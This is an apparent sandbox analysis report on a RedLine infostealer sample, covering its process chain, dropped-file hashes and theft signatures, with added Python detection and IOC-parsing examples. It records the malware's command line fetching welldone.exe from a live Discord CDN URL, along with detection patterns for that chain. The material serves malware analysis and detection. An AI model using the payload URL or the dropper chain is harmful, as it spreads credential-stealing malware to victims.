Analysis
- max time kernel: 60s
- max time network: 62s
- platform: windows10_x64
- resource: win10v20210408
- submitted: 27-07-2021 13:20
General
- Target: @Kypidss.exe
- Size: 92KB
- MD5: 6feb31e3fbfadaf1029223c60bc0d60c
- SHA1: 13555e90f6bd008c03403e09fcd17d6a65ab461f
- SHA256: b059aaa7da26904746289493bcc558f552408b0a4df2e86ff8ed0c675f4dc23e
- SHA512: 5680e753eb00386413fa4352a9169b6a0d1eb13b6ae5fe9c167e9999d40634d9318fe2bc91c6f76df22f00e0dc174fc38207a601024bf9f3093e71924eef44cb
Malware Config
Signatures
- RedLine
  RedLine Stealer is a malware family written in C#, first appearing in early 2020.
- Downloads MZ/PE file
- Executes dropped EXE (4 IoCs)
  Processes:
    pid   process
    752   mine.exe
    3864  extd.exe
    2848  extd.exe
    3876  extd.exe
- Yara rule matches on dropped files
  Processes:
    resource                                                        yara_rule
    C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe   upx
  The report repeats this row four times, once per extd.exe process; it is one UPX-packed file (see Downloads), so the rule fired on the same binary each time.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers target the data browsers keep on disk: saved credentials, cookies and session tokens, autofill entries and browsing history.
- Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
- Checks installed software on the system (1 TTP)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP. Both hits are the same service; legitimate software queries it too, so the hostname is a weak indicator on its own and gains weight only in combination with the other signatures here.
  Processes:
    flow  ioc
    15    ipinfo.io
    16    ipinfo.io
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). The sandbox's generic note for this signature reads "Likely ransomware behaviour"; nothing else in this report supports that reading (no encryption or ransom-note artefacts among the dropped files), and drive enumeration is equally typical of a stealer looking for files to collect, which is what the surrounding signatures indicate.
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes:
    pid  process
    652  @Kypidss.exe
    652  @Kypidss.exe
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes:
    description              pid  process
    Token: SeDebugPrivilege  652  @Kypidss.exe
- Suspicious use of WriteProcessMemory (10 IoCs)
  Processes:
    pid   process       target pid  target process
    652   @Kypidss.exe  752         mine.exe
    652   @Kypidss.exe  752         mine.exe
    752   mine.exe      1556        cmd.exe
    752   mine.exe      1556        cmd.exe
    1556  cmd.exe       3864        extd.exe
    1556  cmd.exe       3864        extd.exe
    1556  cmd.exe       2848        extd.exe
    1556  cmd.exe       2848        extd.exe
    1556  cmd.exe       3876        extd.exe
    1556  cmd.exe       3876        extd.exe
  Every row is a parent writing into a child it has just created, and the rows match the process tree below one-to-one; no process writes into an unrelated one. Setting up a new child's address space involves such writes, so these hits document the launch chain rather than evidence of injection into a third-party process.
Processes
- depth 1: C:\Users\Admin\AppData\Local\Temp\@Kypidss.exe
  "C:\Users\Admin\AppData\Local\Temp\@Kypidss.exe"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - depth 2: C:\Users\Admin\AppData\Local\Temp\mine.exe
    "C:\Users\Admin\AppData\Local\Temp\mine.exe"
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    - depth 3: C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\3B75.bat C:\Users\Admin\AppData\Local\Temp\mine.exe"
      - Suspicious use of WriteProcessMemory
      - depth 4: C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe
        C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
        - Executes dropped EXE
      - depth 4: C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe
        C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
        - Executes dropped EXE
      - depth 4: C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe
        C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/868908533897363470/869566660368035880/welldone.exe" "welldone.exe" "" "" "" "" "" ""
        - Executes dropped EXE

Reading the tree: the RedLine-flagged sample (@Kypidss.exe, PID 652) drops and runs mine.exe (PID 752). mine.exe unpacks a batch script and a helper binary into a nested temp directory (3B73.tmp\3B74.tmp) and runs the script through cmd.exe, passing its own path as the script's first argument. The script invokes the helper three times, with the switches "/hideself", "/random" "9000000" and "/download", the last fetching welldone.exe from a Discord CDN attachment URL. That download is the most plausible source of the "Downloads MZ/PE file" signature, but welldone.exe does not appear in the Downloads list, so its hash is not recorded in this report and whatever it did is not visible here. A batch script unpacked to a nested %TEMP% directory and run via cmd.exe, next to a helper that takes /download-style switches, is the layout produced by batch-to-EXE wrapper tools; that attribution is an inference from the layout, not something the report states.
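The chain above is easy to hunt for once process-creation events carry parent PIDs and command lines. The following is an added example, not code from the sandbox report or from the sample: it builds the parent/child tree from constructed events that mirror the tree above (plus a benign explorer.exe/notepad.exe chain as a control), flags cmd.exe running a .bat from a nested *.tmp directory under %TEMP%, flags a %TEMP%-resident child of that cmd.exe being handed a "/download" switch and a URL, and records whether every user-land ancestor lives in %TEMP%. The field names pid/ppid/image/command_line are an assumption about the log source, not any product's schema.

```python
"""Flag the dropped-batch-plus-download-helper launch chain in process-creation events.

Added example; not from the report. Event fields (pid, ppid, image, command_line)
are an assumed log schema. PIDs and command lines below are copied from the
report's process tree; the explorer/notepad chain is a constructed benign control.
"""
import re
from typing import Dict, List

# A .bat inside a nested *.tmp directory under %TEMP%, as in the report's cmd.exe line.
TEMP_BATCH_RE = re.compile(r'(?i)\\Temp\\[^"\s]*\.tmp\\[^"\s]*\.bat\b')
TEMP_DIR_RE = re.compile(r"(?i)\\AppData\\Local\\Temp\\")
DOWNLOAD_FLAG_RE = re.compile(r'(?i)"?/download"?\s')
URL_RE = re.compile(r'https?://[^\s"]+')
DISCORD_CDN = "https://cdn.discordapp.com/"

EXTD = r"C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe"

EVENTS: List[Dict] = [
    {"pid": 652, "ppid": 0, "image": r"C:\Users\Admin\AppData\Local\Temp\@Kypidss.exe",
     "command_line": r'"C:\Users\Admin\AppData\Local\Temp\@Kypidss.exe"'},
    {"pid": 752, "ppid": 652, "image": r"C:\Users\Admin\AppData\Local\Temp\mine.exe",
     "command_line": r'"C:\Users\Admin\AppData\Local\Temp\mine.exe"'},
    {"pid": 1556, "ppid": 752, "image": r"C:\Windows\system32\cmd.exe",
     "command_line": r'"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\3B75.bat C:\Users\Admin\AppData\Local\Temp\mine.exe"'},
    {"pid": 3864, "ppid": 1556, "image": EXTD,
     "command_line": EXTD + r' "/hideself" "" "" "" "" "" "" "" ""'},
    {"pid": 2848, "ppid": 1556, "image": EXTD,
     "command_line": EXTD + r' "/random" "9000000" "" "" "" "" "" "" ""'},
    {"pid": 3876, "ppid": 1556, "image": EXTD,
     "command_line": EXTD + r' "/download" "https://cdn.discordapp.com/attachments/868908533897363470/869566660368035880/welldone.exe" "welldone.exe" "" "" "" "" "" ""'},
    # Constructed benign control: explorer.exe opening a file in notepad.exe.
    {"pid": 4000, "ppid": 1, "image": r"C:\Windows\explorer.exe",
     "command_line": r"C:\Windows\explorer.exe"},
    {"pid": 4100, "ppid": 4000, "image": r"C:\Windows\System32\notepad.exe",
     "command_line": r'"C:\Windows\System32\notepad.exe" C:\Users\Admin\AppData\Local\Temp\notes.txt'},
]


def index_by_pid(events: List[Dict]) -> Dict[int, Dict]:
    return {e["pid"]: e for e in events}


def basename(image: str) -> str:
    return image.rsplit("\\", 1)[-1]


def lineage(pid: int, by_pid: Dict[int, Dict]) -> List[str]:
    """Image basenames from the oldest ancestor present in the log down to pid."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:      # seen-set guards against PID reuse loops
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


def temp_only_lineage(pid: int, by_pid: Dict[int, Dict]) -> bool:
    """True when at least two non-Windows binaries sit in the ancestry (pid included)
    and every one of them runs from %TEMP%: the whole chain consists of dropped files."""
    images, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        images.append(by_pid[pid]["image"])
        pid = by_pid[pid]["ppid"]
    user = [i for i in images if not i.lower().startswith("c:\\windows\\")]
    return len(user) >= 2 and all(TEMP_DIR_RE.search(i) for i in user)


def detect(events: List[Dict]) -> List[Dict]:
    by_pid = index_by_pid(events)
    findings: List[Dict] = []

    def hit(ev: Dict, rule: str, detail: str) -> None:
        findings.append({"pid": ev["pid"], "rule": rule, "detail": detail,
                         "lineage": lineage(ev["pid"], by_pid),
                         "lineage_all_temp": temp_only_lineage(ev["pid"], by_pid)})

    for ev in events:
        cmd = ev["command_line"]
        parent = by_pid.get(ev["ppid"])
        # Rule 1: cmd.exe running a .bat unpacked into a nested *.tmp directory under %TEMP%.
        if basename(ev["image"]).lower() == "cmd.exe":
            m = TEMP_BATCH_RE.search(cmd)
            if m:
                hit(ev, "cmd_runs_temp_tmp_batch", m.group(0))
        # Rule 2: a %TEMP%-resident child of cmd.exe handed a /download switch and a URL.
        if (parent is not None and basename(parent["image"]).lower() == "cmd.exe"
                and TEMP_DIR_RE.search(ev["image"]) and DOWNLOAD_FLAG_RE.search(cmd)):
            url = URL_RE.search(cmd)
            hit(ev, "temp_helper_download_url", url.group(0) if url else "")
            # Rule 3: the payload is pulled from the Discord CDN, widely abused as free hosting.
            if url and url.group(0).lower().startswith(DISCORD_CDN):
                hit(ev, "discord_cdn_payload", url.group(0))
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f["pid"], f["rule"], " -> ".join(f["lineage"]), f["detail"])
```

Rule 1 fires on PID 1556 and rules 2 and 3 on PID 3876 only; the "/hideself" and "/random" helper invocations and the control chain produce nothing, and both findings carry lineage_all_temp set, which is the detail worth surfacing to an analyst before the hash of the downloaded file is known.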
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\3B75.bat
  MD5     31e5e4e45e645d8729a1865445a20c37
  SHA1    0b86aee14ae577e61f98fe8683b8b3c992a6b2ff
  SHA256  6b06c88ef49eef9fb4f4d62952d974758384f91354f3d443cf69dc19a93e73a8
  SHA512  cdb82a22ace68f3a56c82151aabd86fdcac7b4d0e2f74afe866317df9fba35f86f36ed249bcc1883ac26bf0aa864490ac8064680954be29cde760d2117302b07
- C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exe
  (the report lists this path four times with identical hashes; it is a single dropped file)
  MD5     c14ce13ab09b4829f67a879d735a10a1
  SHA1    537e1ce843f07ce629699ef5742c42ee2f06e9b6
  SHA256  ef2699ba677fcdb8a3b70a711a59a5892d8439e108e3ac4d27a7f946c4d01a4a
  SHA512  c1cf8eb4a5ca6539e5d2608c2085e7804ca77b7244aa7bfa7e1dde30cb88b9a4e6bb9e3d80304b7d8825355eab63d05e6425fa8267a9d20ac5f1998bed05fa38
- C:\Users\Admin\AppData\Local\Temp\mine.exe
  (the report lists this path twice with identical hashes; it is a single dropped file)
  MD5     a71e5bd022c844df2ef80234f5ad0691
  SHA1    9ce9dc60e09c536e62fdf60bc90318fd6299dcd4
  SHA256  fdd3be574e0628170c34bba09040b12864014ab7701327634c202f462830981a
  SHA512  aaa65d7c8b10200e053f4a04ee335fb122571a291b3dd07bec298ada1f1dc77145d63336a35978d6f98a3ba6b2fd1370ae600a8f2a8206f8ac995b347107f082
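Turning a dropped-files section like the one above into a clean IOC set means two things: parsing it in the shape the report presents it (the algorithm label fused onto the path for MD5 and onto the digest for the SHA variants), and collapsing the per-process repeats into one record per file. The following is an added example, not part of the report: it parses a constructed excerpt copied from the entries above, rejects any digest whose hex length does not match its algorithm, deduplicates by SHA-256, and raises if two entries share a SHA-256 but disagree on another digest, which would mean a transcription error. The one-entry-per-MD5-line layout is an assumption taken from this page, not a general report format.

```python
"""Parse flattened dropped-file hash entries and collapse repeats into one record per file.

Added example; not from the report. The input layout (path fused with "MD5",
digest on the next line, then "SHA1<hex>", "SHA256<hex>", "SHA512<hex>") is taken
from how the Downloads section above reads and is assumed, not a documented format.
"""
import re
from typing import Dict, List

DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}
FUSED_RE = re.compile(r"^(SHA1|SHA256|SHA512)([0-9a-fA-F]+)$")
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")

# Constructed excerpt: the first three entries of the Downloads section, verbatim layout.
REPORT_TEXT = r"""
-
C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\3B75.batMD5
31e5e4e45e645d8729a1865445a20c37
SHA10b86aee14ae577e61f98fe8683b8b3c992a6b2ff
SHA2566b06c88ef49eef9fb4f4d62952d974758384f91354f3d443cf69dc19a93e73a8
SHA512cdb82a22ace68f3a56c82151aabd86fdcac7b4d0e2f74afe866317df9fba35f86f36ed249bcc1883ac26bf0aa864490ac8064680954be29cde760d2117302b07
-
C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exeMD5
c14ce13ab09b4829f67a879d735a10a1
SHA1537e1ce843f07ce629699ef5742c42ee2f06e9b6
SHA256ef2699ba677fcdb8a3b70a711a59a5892d8439e108e3ac4d27a7f946c4d01a4a
SHA512c1cf8eb4a5ca6539e5d2608c2085e7804ca77b7244aa7bfa7e1dde30cb88b9a4e6bb9e3d80304b7d8825355eab63d05e6425fa8267a9d20ac5f1998bed05fa38
-
C:\Users\Admin\AppData\Local\Temp\3B73.tmp\3B74.tmp\extd.exeMD5
c14ce13ab09b4829f67a879d735a10a1
SHA1537e1ce843f07ce629699ef5742c42ee2f06e9b6
SHA256ef2699ba677fcdb8a3b70a711a59a5892d8439e108e3ac4d27a7f946c4d01a4a
SHA512c1cf8eb4a5ca6539e5d2608c2085e7804ca77b7244aa7bfa7e1dde30cb88b9a4e6bb9e3d80304b7d8825355eab63d05e6425fa8267a9d20ac5f1998bed05fa38
"""


def digest_is_valid(alg: str, hexstr: str) -> bool:
    """A digest is accepted only if it is hex and exactly the length its algorithm produces."""
    return alg in DIGEST_LEN and len(hexstr) == DIGEST_LEN[alg] and HEX_RE.match(hexstr) is not None


def check_digest(alg: str, hexstr: str) -> str:
    if not digest_is_valid(alg, hexstr):
        raise ValueError(f"{alg}: {len(hexstr)} hex chars, expected {DIGEST_LEN.get(alg)}: {hexstr!r}")
    return hexstr.lower()


def parse_dropped_files(text: str) -> List[Dict[str, str]]:
    """One dict per listed entry, keys: path, MD5, SHA1, SHA256, SHA512."""
    entries: List[Dict[str, str]] = []
    cur: Dict[str, str] = {}
    expect_md5 = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line == "-":
            continue
        if expect_md5:                       # the MD5 digest sits on the line after the path
            cur["MD5"] = check_digest("MD5", line)
            expect_md5 = False
            continue
        fused = FUSED_RE.match(line)         # "SHA1<hex>", "SHA256<hex>", "SHA512<hex>"
        if fused and cur:
            cur[fused.group(1)] = check_digest(fused.group(1), fused.group(2))
            continue
        if line.endswith("MD5"):             # "<path>MD5" opens a new entry
            cur = {"path": line[:-3]}
            entries.append(cur)
            expect_md5 = True
            continue
        raise ValueError(f"unexpected line: {line!r}")
    for e in entries:
        missing = [a for a in DIGEST_LEN if a not in e]
        if missing:
            raise ValueError(f"{e['path']}: missing {missing}")
    return entries


def unique_files(entries: List[Dict[str, str]]) -> Dict[str, Dict]:
    """Collapse repeated listings into one record per SHA-256, counting the repeats."""
    files: Dict[str, Dict] = {}
    for e in entries:
        rec = files.setdefault(e["SHA256"], {"paths": [], "count": 0, **{a: e[a] for a in DIGEST_LEN}})
        rec["count"] += 1
        if e["path"] not in rec["paths"]:
            rec["paths"].append(e["path"])
        for a in DIGEST_LEN:                 # same SHA-256 but a different MD5/SHA-1/SHA-512 is a transcription error
            if rec[a] != e[a]:
                raise ValueError(f"{e['path']}: {a} differs between entries with the same SHA256")
    return files


if __name__ == "__main__":
    for sha256, rec in unique_files(parse_dropped_files(REPORT_TEXT)).items():
        print(sha256, rec["count"], rec["paths"])
```

On the excerpt this yields two files from three entries, with extd.exe counted twice; run over the whole section it gives the three distinct dropped files the report actually contains. Truncated digests, such as a SHA-1 that lost characters at a line break, are rejected rather than silently recorded as IOCs.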
- Memory dumps (the ten 4KB region dumps all belong to PID 652, the RedLine-flagged sample; the remaining five are mapping dumps of the dropped processes)
  memory/652-114-0x00000000003D0000-0x00000000003D1000-memory.dmp  4KB
  memory/652-116-0x00000000052B0000-0x00000000052B1000-memory.dmp  4KB
  memory/652-117-0x0000000004BE0000-0x0000000004BE1000-memory.dmp  4KB
  memory/652-118-0x0000000004C40000-0x0000000004C41000-memory.dmp  4KB
  memory/652-119-0x0000000004CA0000-0x0000000004CA1000-memory.dmp  4KB
  memory/652-120-0x0000000004C90000-0x0000000004C91000-memory.dmp  4KB
  memory/652-121-0x0000000004EF0000-0x0000000004EF1000-memory.dmp  4KB
  memory/652-122-0x0000000006000000-0x0000000006001000-memory.dmp  4KB
  memory/652-123-0x0000000006340000-0x0000000006341000-memory.dmp  4KB
  memory/652-124-0x00000000068E0000-0x00000000068E1000-memory.dmp  4KB
  memory/752-125-0x0000000000000000-mapping.dmp
  memory/1556-128-0x0000000000000000-mapping.dmp
  memory/3864-130-0x0000000000000000-mapping.dmp
  memory/2848-133-0x0000000000000000-mapping.dmp
  memory/3876-135-0x0000000000000000-mapping.dmp